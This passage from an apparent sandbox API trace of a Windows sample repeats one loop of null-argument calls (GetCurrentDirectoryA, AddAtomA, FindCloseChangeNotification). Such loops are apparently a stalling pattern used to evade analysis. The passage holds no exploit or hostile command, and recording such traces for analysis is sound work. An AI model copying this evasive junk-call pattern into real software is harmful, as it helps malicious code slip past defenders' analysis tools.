(lpString=0x0) returned 0x0 [0182.180] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.180] AddAtomA (lpString=0x0) returned 0x0 [0182.180] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.180] AddAtomA (lpString=0x0) returned 0x0 [0182.180] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.180] AddAtomA (lpString=0x0) returned 0x0 [0182.180] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.181] AddAtomA (lpString=0x0) returned 0x0 [0182.181] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.181] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.181] AddAtomA (lpString=0x0) returned 0x0 [0182.181] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.181] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.181] AddAtomA (lpString=0x0) returned 0x0 [0182.181] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.181] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.181] AddAtomA (lpString=0x0) returned 0x0 [0182.181] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.181] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.181] AddAtomA (lpString=0x0) returned 0x0 [0182.181] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.182] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.182] AddAtomA (lpString=0x0) returned 0x0 [0182.182] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.183] AddAtomA (lpString=0x0) returned 0x0 [0182.183] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.183] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.184] AddAtomA (lpString=0x0) returned 0x0 [0182.184] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.184] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.184] AddAtomA (lpString=0x0) returned 0x0 [0182.184] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.184] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.184] AddAtomA (lpString=0x0) returned 0x0 [0182.184] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.184] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.184] AddAtomA (lpString=0x0) returned 0x0 [0182.184] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.184] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.184] AddAtomA (lpString=0x0) returned 0x0 [0182.184] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.184] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.185] AddAtomA (lpString=0x0) returned 0x0 [0182.185] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.185] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.186] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.186] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.186] AddAtomA (lpString=0x0) returned 0x0 [0182.187] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.187] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.187] AddAtomA (lpString=0x0) returned 0x0 [0182.187] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.187] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.187] AddAtomA (lpString=0x0) returned 0x0 [0182.187] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.187] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.187] AddAtomA (lpString=0x0) returned 0x0 [0182.187] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.187] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.235] AddAtomA (lpString=0x0) returned 0x0 [0182.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.236] AddAtomA (lpString=0x0) returned 0x0 [0182.236] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.236] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.237] AddAtomA (lpString=0x0) returned 0x0 [0182.237] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.237] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.238] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.238] AddAtomA (lpString=0x0) returned 0x0 [0182.238] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.239] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.239] AddAtomA (lpString=0x0) returned 0x0 [0182.239] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.240] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.240] AddAtomA (lpString=0x0) returned 0x0 [0182.240] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.241] AddAtomA (lpString=0x0) returned 0x0 [0182.241] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.241] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.242] AddAtomA (lpString=0x0) returned 0x0 [0182.242] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.242] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.243] AddAtomA (lpString=0x0) returned 0x0 [0182.243] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.243] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 